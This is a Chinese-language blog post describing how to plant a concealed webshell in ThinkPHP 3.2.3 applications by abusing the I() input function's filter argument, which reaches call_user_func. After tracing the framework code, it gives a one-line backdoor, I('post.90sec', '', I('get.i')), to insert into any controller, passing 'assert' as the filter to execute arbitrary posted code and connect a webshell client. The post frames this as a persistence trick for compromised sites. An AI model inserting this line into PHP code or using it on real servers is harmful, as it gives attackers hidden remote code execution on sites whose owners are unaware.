阿八博客

  • 100000+

    文章

  • 23

    评论

  • 20

    友链

  • 最近新加了很多技术文章,大家多来逛逛吧~~~~
  • 喜欢这个网站的朋友可以加一下QQ群,我们一起交流技术。

ThinkPHP留后门技巧

欢迎来到阿八个人博客网站。本 阿八个人博客 网站提供最新的站长新闻,各种互联网资讯。 喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术! URL链接:https://www.abboke.com/rz/2019/1010/116721.html

90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。

thinkphp的I函数,是其处理输入的函数,一般用法为I('get.id')——从$_GET数组中取出键为id的值,post、cookie类似。

let me see see I函数的代码:

codehilite">
<?phpfunction I($name, $default = '', $filter = null, $datas = null){    ...    if ('' == $name) {        // 获取全部变量        $data    = $input;        $filters = isset($filter) ? $filter : C('DEFAULT_FILTER');        if ($filters) {            if (is_string($filters)) {                $filters = explode(',', $filters);            }            foreach ($filters as $filter) {                $data = array_map_recursive($filter, $data); // 参数过滤            }        }    } elseif (isset($input[$name])) {        // 取值操作        $data    = $input[$name];        $filters = isset($filter) ? $filter : C('DEFAULT_FILTER');        if ($filters) {            if (is_string($filters)) {                if (0 === strpos($filters, '/')) {                    if (1 !== preg_match($filters, (string) $data)) {                        // 支持正则验证                        return isset($default) ? $default : null;                    }                } else {                    $filters = explode(',', $filters);                }            } elseif (is_int($filters)) {                $filters = array($filters);            }            if (is_array($filters)) {                foreach ($filters as $filter) {                    if (function_exists($filter)) {                        $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // 参数过滤                    } else {                        $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter));                        if (false === $data) {                            return isset($default) ? $default : null;                        }                    }                }            }        }    ...    return $data;}

I函数的第三个参数是$filter,作用是对变量的过滤。

新版本(3.2.3)中,$filter可以传入两种4种值:

一个过滤函数(字符串)一些过滤函数组成的字符串,其间用“|”分割一些过滤函数的字符串组成的数组以“/”开头的正则表达式

可见代码,若$filter为空的话,其默认值为C('DEFAULT_FILTER')。我们在配置文件中可以看到,DEFAULT_FILTER=htmlspecialchars

convention_php_—_thinkphp.png

以上4个情况最后归为两个,1是过滤回调函数,2是过滤的正则。正则部分如下:

codehilite">
<?phpif (0 === strpos($filters, '/')) {    if (1 !== preg_match($filters, (string) $data)) {        // 支持正则验证        return isset($default) ? $default : null;    }}

如果第0个字符是/,则说明传入的是正则,用preg_match进行匹配验证,不匹配则返回默认值$default。

而回调函数部分,是我们留后门的关键。核心是这一段:

codehilite">
<?phpif (is_array($filters)) {    foreach ($filters as $filter) {        if (function_exists($filter)) {            $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // 参数过滤        } else {            $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter));            if (false === $data) {                return isset($default) ? $default : null;            }        }    }}

如果函数存在,则直接调用array_map_recursive执行。如果函数不存在,则用php默认的过滤器filter_var进行过滤。

我们跟进array_map_recursive函数:

codehilite">
<?phpfunction array_map_recursive($filter, $data){    $result = array();    foreach ($data as $key => $val) {        $result[$key] = is_array($val)        ? array_map_recursive($filter, $val)        : call_user_func($filter, $val);    }    return $result;}

明显是一个递归执行的过程,最后调用的是call_user_func 。

还记得我说过的php回调后门么(https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html),ThinkPHP厚道,居然给我们预置了一个回调后门,让我们可以万分隐蔽的留下webshell。

所以,我们只需要随意找个controller,在可访问的方法中插入:

codehilite">
I('post.90sec', '', I('get.i'));

如上,第三个参数就是刚说的$filter,我们只需要把回调后门函数名字(assert)作为第三个参数传入,即可构造一个回调后门。

我就拿thinkphp默认的IndexController下的index方法示例:

IndexController_class_php_—_thinkphp.png

如下即可执行任意代码:

phpinfo__.png

一个回调后门,菜刀也可以连接。

相关文章